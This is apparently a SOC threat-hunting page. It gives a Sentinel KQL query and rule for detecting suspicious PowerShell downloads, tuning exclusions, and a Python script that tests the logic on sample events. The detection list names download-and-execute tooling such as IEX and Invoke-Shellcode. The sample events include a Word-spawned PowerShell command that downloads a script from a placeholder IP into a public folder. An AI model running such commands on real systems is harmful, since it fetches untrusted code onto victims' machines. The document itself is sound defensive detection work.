Unusual PowerShell execution events that involve downloading files may indicate an adversary attempting to exfiltrate data or deploy malicious payloads. SOC teams should proactively hunt for this behavior in Azure Sentinel to identify potential compromise early and prevent lateral movement or data theft.
KQL Query
```kql
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName in~ ("powershell.exe", "powershell_ise.exe")
| where ProcessCommandLine has "Net.WebClient"
    or ProcessCommandLine has "DownloadFile"
    or ProcessCommandLine has "Invoke-WebRequest"
    or ProcessCommandLine has "Invoke-Shellcode"
    or ProcessCommandLine has "http"
    or ProcessCommandLine has "IEX"
    or ProcessCommandLine has "Start-BitsTransfer"
    or ProcessCommandLine has "mpcmdrun.exe"
| project Timestamp, DeviceName, InitiatingProcessFileName, FileName, ProcessCommandLine
| top 100 by Timestamp
```
```yaml
id: c34d1d0e-1cf4-45d0-b628-a2cfde329182
name: PowerShell downloads
description: |
  Finds PowerShell execution events that could involve a download.
requiredDataConnectors:
  - connectorId: MicrosoftThreatProtection
    dataTypes:
      - DeviceProcessEvents
query: |
  DeviceProcessEvents
  | where Timestamp > ago(7d)
  | where FileName in~ ("powershell.exe", "powershell_ise.exe")
  | where ProcessCommandLine has "Net.WebClient"
      or ProcessCommandLine has "DownloadFile"
      or ProcessCommandLine has "Invoke-WebRequest"
      or ProcessCommandLine has "Invoke-Shellcode"
      or ProcessCommandLine has "http"
      or ProcessCommandLine has "IEX"
      or ProcessCommandLine has "Start-BitsTransfer"
      or ProcessCommandLine has "mpcmdrun.exe"
  | project Timestamp, DeviceName, InitiatingProcessFileName, FileName, ProcessCommandLine
  | top 100 by Timestamp
```
| Sentinel Table | Notes |
|---|---|
| DeviceProcessEvents | Ensure this data connector is enabled |
- Scenario: A system administrator is using PowerShell to download a software update from a trusted internal repository.
  Filter/Exclusion: Check the URL or file path against a whitelist of known internal update servers (e.g., internal-update-server.com or \\fileserver\updates).
- Scenario: A scheduled job runs a PowerShell script to fetch configuration data from a central management system.
  Filter/Exclusion: Exclude events where the script path contains known configuration management tools (e.g., C:\Program Files\SCCM\ or C:\Windows\System32\GroupPolicy).
- Scenario: An IT support team uses PowerShell to download diagnostic tools from a company-approved download site.
  Filter/Exclusion: Filter out events where the download source is a known internal tool repository (e.g., https://download.tools.corp.example.com).
- Scenario: A user runs a PowerShell script to generate a report that requires downloading a template file from a shared network drive.
  Filter/Exclusion: Exclude events where the file path is within a shared network directory (e.g., \\fileserver\shared\templates) or the script is located in a known reporting tool directory.
- Scenario: A DevOps engineer uses PowerShell to pull a Docker image from a private registry during a CI/CD pipeline.
  Filter/Exclusion: Exclude events where the command includes a known CI/CD tool or registry (e.g., docker pull or registry.corp.example.com).
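As an added, runnable illustration (not part of the page and not the Sentinel hunting query itself), the Python below replays the query's matching logic over constructed DeviceProcessEvents rows and then applies the exclusions from the scenarios above as an allowlist. The `kql_has` helper approximates Kusto's term-based `has` operator, which carries the caveat a tuner should know: `has "http"` matches only a whole `http` term, so an `https://` URL is not caught by that clause and is surfaced only through another indicator such as `Invoke-WebRequest`. All device names, hostnames, paths and the 203.0.113.x address are constructed sample values; the allowlist entries are the page's own placeholder examples.

```python
import re
from dataclasses import dataclass
from typing import List

# Constructed rows shaped like the DeviceProcessEvents columns the page's query projects.
@dataclass
class ProcessEvent:
    Timestamp: str
    DeviceName: str
    InitiatingProcessFileName: str
    FileName: str
    ProcessCommandLine: str

# Indicator strings taken verbatim from the page's KQL query.
DOWNLOAD_INDICATORS = [
    "Net.WebClient", "DownloadFile", "Invoke-WebRequest", "Invoke-Shellcode",
    "http", "IEX", "Start-BitsTransfer", "mpcmdrun.exe",
]
POWERSHELL_BINARIES = {"powershell.exe", "powershell_ise.exe"}

_TERM = re.compile(r"[a-z0-9]+")

def _terms(text: str) -> List[str]:
    return _TERM.findall(text.lower())

def kql_has(haystack: str, needle: str) -> bool:
    """Approximation of the KQL `has` operator (assumption: a term is a run of
    alphanumerics, compared case-insensitively as whole terms). A multi-term needle
    such as "Net.WebClient" must appear as consecutive terms."""
    h, n = _terms(haystack), _terms(needle)
    if not n or len(n) > len(h):
        return False
    return any(h[i:i + len(n)] == n for i in range(len(h) - len(n) + 1))

def hit_indicators(command_line: str) -> List[str]:
    """Which of the page's `has` clauses would fire on this command line."""
    return [ind for ind in DOWNLOAD_INDICATORS if kql_has(command_line, ind)]

def matches_hunt(ev: ProcessEvent) -> bool:
    """The page's query minus the 7-day window: a PowerShell binary plus any indicator."""
    return ev.FileName.lower() in POWERSHELL_BINARIES and bool(hit_indicators(ev.ProcessCommandLine))

# Tuning allowlist built from the false-positive scenarios on the page (the hostnames
# and paths are the page's placeholder examples, not real infrastructure).
ALLOWED_SOURCES = [
    "internal-update-server.com",
    "download.tools.corp.example.com",
    "registry.corp.example.com",
    "\\\\fileserver\\updates",
    "\\\\fileserver\\shared\\templates",
]
ALLOWED_SCRIPT_DIRS = [
    "C:\\Program Files\\SCCM\\",
    "C:\\Windows\\System32\\GroupPolicy",
]

def is_expected(ev: ProcessEvent) -> bool:
    """Exclusion filter: the command line names an allowlisted source or script directory."""
    cl = ev.ProcessCommandLine.lower()
    return any(s.lower() in cl for s in ALLOWED_SOURCES + ALLOWED_SCRIPT_DIRS)

def hunt(events: List[ProcessEvent]) -> List[ProcessEvent]:
    """Rows the tuned hunt would surface, newest first (like `top ... by Timestamp`)."""
    hits = [ev for ev in events if matches_hunt(ev) and not is_expected(ev)]
    return sorted(hits, key=lambda ev: ev.Timestamp, reverse=True)

# Constructed sample telemetry; 203.0.113.10 is from the TEST-NET-3 documentation range.
SAMPLE_EVENTS = [
    ProcessEvent("2024-05-01T08:00:00Z", "WS-0017", "explorer.exe", "powershell.exe",
                 "powershell.exe -c \"(New-Object Net.WebClient).DownloadFile("
                 "'http://internal-update-server.com/patch.msi','C:\\Temp\\patch.msi')\""),
    ProcessEvent("2024-05-01T09:30:00Z", "WS-0042", "winword.exe", "powershell.exe",
                 "powershell.exe -NoProfile -Command \"Invoke-WebRequest -Uri "
                 "https://203.0.113.10/update.ps1 -OutFile C:\\Users\\Public\\update.ps1\""),
    ProcessEvent("2024-05-01T10:00:00Z", "SRV-CM01", "svchost.exe", "powershell.exe",
                 "powershell.exe -Command \"Start-BitsTransfer -Source "
                 "https://cm.corp.example.com/config.xml "
                 "-Destination 'C:\\Program Files\\SCCM\\config.xml'\""),
    ProcessEvent("2024-05-01T11:00:00Z", "WS-0099", "explorer.exe", "cmd.exe",
                 "cmd.exe /c curl.exe http://203.0.113.10/readme.txt"),
]

if __name__ == "__main__":
    for ev in hunt(SAMPLE_EVENTS):
        print(ev.Timestamp, ev.DeviceName, ev.InitiatingProcessFileName,
              hit_indicators(ev.ProcessCommandLine))
```

Run directly, it prints only the WS-0042 row: the internal update server and the SCCM path are allowlisted, the cmd.exe row fails the FileName filter, and the https download is caught by `Invoke-WebRequest` rather than by the `http` clause. In KQL the same tuning is usually expressed with `has_any` for the indicator list and a `not(ProcessCommandLine has_any (...))` clause or a watchlist for the allowlist; this script is only a model of that logic, useful for checking what a proposed exclusion will and will not suppress before changing the hunt.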